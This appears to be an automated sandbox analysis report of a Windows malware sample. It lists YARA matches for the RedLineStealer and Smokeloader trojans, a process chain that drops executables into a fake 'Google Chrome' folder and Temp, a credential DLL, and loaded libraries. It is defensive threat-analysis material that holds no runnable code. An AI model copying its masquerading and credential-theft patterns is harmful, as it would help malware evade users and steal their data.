Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0491ADC2 4_2_0491ADC2
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048F4B79 4_2_048F4B79
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00409DA0 24_2_00409DA0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0043B163 24_2_0043B163
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00427101 24_2_00427101
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00424123 24_2_00424123
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0044A2E9 24_2_0044A2E9
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00446448 24_2_00446448
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_004294A2 24_2_004294A2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00424912 24_2_00424912
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0044AA3B 24_2_0044AA3B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0044AB5B 24_2_0044AB5B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0044BEA0 24_2_0044BEA0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00404FE0 24_2_00404FE0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00445FB0 24_2_00445FB0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0490A550 24_2_0490A550
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048E9709 24_2_048E9709
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048CA007 24_2_048CA007
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0490C107 24_2_0490C107
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_04906217 24_2_04906217
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048C5247 24_2_048C5247
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048E438A 24_2_048E438A
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048FB3CA 24_2_048FB3CA
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048E7368 24_2_048E7368
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0490ACA2 24_2_0490ACA2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0490ADC2 24_2_0490ADC2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048E4B79 24_2_048E4B79
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00424123 36_2_00424123
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0044A2E9 36_2_0044A2E9
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00446448 36_2_00446448
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00424912 36_2_00424912
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0044AA3B 36_2_0044AA3B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0044AB5B 36_2_0044AB5B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00404FE0 36_2_00404FE0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0043B163 36_2_0043B163
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00427101 36_2_00427101
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0040F420 36_2_0040F420
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_004294A2 36_2_004294A2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0044BEA0 36_2_0044BEA0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00445FB0 36_2_00445FB0
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0495A550 36_2_0495A550
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04939709 36_2_04939709
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0491A007 36_2_0491A007
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0495C107 36_2_0495C107
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04956217 36_2_04956217
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04915247 36_2_04915247
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0493438A 36_2_0493438A
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0494B3CA 36_2_0494B3CA
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04937368 36_2_04937368
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0495ACA2 36_2_0495ACA2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0495ADC2 36_2_0495ADC2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04934B79 36_2_04934B79
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 0492B637 appears 127 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 04930BCA appears 48 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 0041B3D0 appears 245 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 048E0EC9 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 048E1507 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 00420978 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 0041F3F9 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 00420963 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 0041ABB0 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 0043C0B3 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 04930EC9 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 04931507 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 00420C62 appears 153 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 004212A0 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 048DB637 appears 127 times
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: String function: 048F0EC9 appears 68 times
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: String function: 048F1507 appears 38 times
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: String function: 0041B3D0 appears 123 times
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: String function: 048EB637 appears 127 times
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: String function: 00420C62 appears 83 times
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: String function: 004212A0 appears 44 times
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 732
Source: GhLMDfzXqQ.exe Static PE information: Number of sections : 11 > 10
Source: 00000004.00000002.2288637913.0000000002DA2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000018.00000002.2290385798.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000018.00000002.2290111678.0000000002EF2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000024.00000002.3366496339.0000000002E34000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000024.00000002.3368787116.0000000004910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2289959026.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@22/62@1/1
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_02DA35BE CreateToolhelp32Snapshot,Module32First, 4_2_02DA35BE
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0040B385 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize, 4_2_0040B385
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe File created: C:\Users\user\AppData\Roaming\Google Chrome\
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Mutant created: \Sessions\1\BaseNamedObjects\810b84e2bfa3a9e2d0d81a3d2ea89e46
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5292:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4972
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2332
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3576
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe File created: C:\Users\user\AppData\Local\Temp\cbb1d94791
Source: GhLMDfzXqQ.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: cred64[1].dll.36.dr, cred64.dll.36.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: cred64[1].dll.36.dr, cred64.dll.36.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: cred64[1].dll.36.dr, cred64.dll.36.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: cred64[1].dll.36.dr, cred64.dll.36.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: cred64[1].dll.36.dr, cred64.dll.36.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: cred64[1].dll.36.dr, cred64.dll.36.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: cred64[1].dll.36.dr, cred64.dll.36.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: GhLMDfzXqQ.exe ReversingLabs: Detection: 47%
Source: GhLMDfzXqQ.exe Virustotal: Detection: 44%
Source: unknown Process created: C:\Users\user\Desktop\GhLMDfzXqQ.exe "C:\Users\user\Desktop\GhLMDfzXqQ.exe"
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Process created: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe "C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe"
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 732
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 752
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 848
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 912
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 932
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 932
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 1028
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 1100
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 1128
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe "C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe"
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 1180
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 472
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 536
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 544
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Process created: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe "C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe"
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe "C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe"
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: srvcli.dll
